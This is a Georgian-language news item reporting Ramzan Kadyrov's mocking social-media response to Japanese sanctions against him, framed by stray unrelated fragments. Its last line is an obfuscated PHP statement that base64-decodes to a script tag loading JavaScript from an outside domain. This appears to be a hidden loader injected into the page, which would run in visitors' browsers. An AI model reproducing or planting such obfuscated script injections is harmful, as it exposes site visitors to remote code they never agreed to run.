celsiusi
ავერსი საქკაბელი
ჩეჩნეთის მეთაური რამზან კადიროვი იაპონიის მიერ მის წინააღმდეგ დაწესებული სანქციებით განაწყენებულია და იაპონიის ხელისუფლების წარმომადგენლებს მუქარით პასუხობს. 
 
კადიროვის თქმით, მას ანგარიშები არ გააჩნდა იაპონიაში და შესაბამისად მისთვის სანქციების დაწესებას არანაირი მნიშვნელობა არ ქონდა. 
 
"იაპონიამ სანქციები დააწესა რუსეთის მოქალაქეების წინააღმდეგ, რომელთა შორის მეც აღმოვჩნდი.  ჯერ კიდევ ახლახანს დავიწყე აშშ-ის და მისი ევროპელი მსახურების იაფფასიანი პოლიტიკის გააზრება, რომლებიც ენერგიული აქტივობის დემონსტრირებისთვის  სანქციებს აწესებენ და ჩემს არარსებულ საბანკო ანგარიშებს ყინავენ. მაგრამ იაპონია? ზნეობისა და კეთილშობილური ქცევის "ბუშიდოს" მრავალსაუკუნოვანი ტრადიციების მქონე ქვეყანა, რომელიც ყოველთვის განცალკევებით იდგა მთელი მსოფლიოსგან მოულოდნელად ევროპის ქვეშ მოექცა.  მე მართლა მაინტერესებს, ასე ერთი შეხედვით ჭკვიანი ადამიანები, როგორ გასულელდნენ და გამიყინეს აქტივები, რომელიც იაპონიაში არასდროს მქონია?
 
დიდი ალბათობით, ფინანსური საქმიანობის აკრძალვის გარდა, აკრძალული მაქვს ანიმეს ყურება და საკურას ყვავილობით ტკბობაც. ნინძებში გავწევრიანდები და ამას ფარულად გავაკეთებ. ეჰ, ნინძობაც კი აღარ შეიძლება.
 
მე უბრალოდ უნდა მივიღო საპასუხო ზომები. ამიერიდან იაპონის ხელმძღვანელობა ჩეჩნეთის მიწაზე ფეხს ვერ დადგამს, გარდა ორი ადგილისა - ბრაგუნისა და სამაშკის ფსიქიატრიული საავადმყოფოებში. მე მონსტრი არ ვარ, რომ მათ აუცილებელი მკურნალობის საშუალება არ მივცე. მათი მთელი ქონება და საბანკო ანგარიშები დაპატიმრებულია, გაიყიდება, თანხები კი კურილის კუნძულების განვითარების ფონდში გადაიგზავნება.
 
სერიოზულად თუ ვიტყვით, იცოდეთ რომ ნებისმიერი ქვეყნის ნებისმიერი სანქციისთვის მიმიფურთხებია. მე მხოლოდ ერთის მეშინია - უფლის სანქციების ქვეშ მოქცევის. მხოლოდ ალაჰთან ურთიერთობის გაფუჭების მეშინია," - წერს რამზან კადიროვი სოციალურ ქსელში.
3769
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");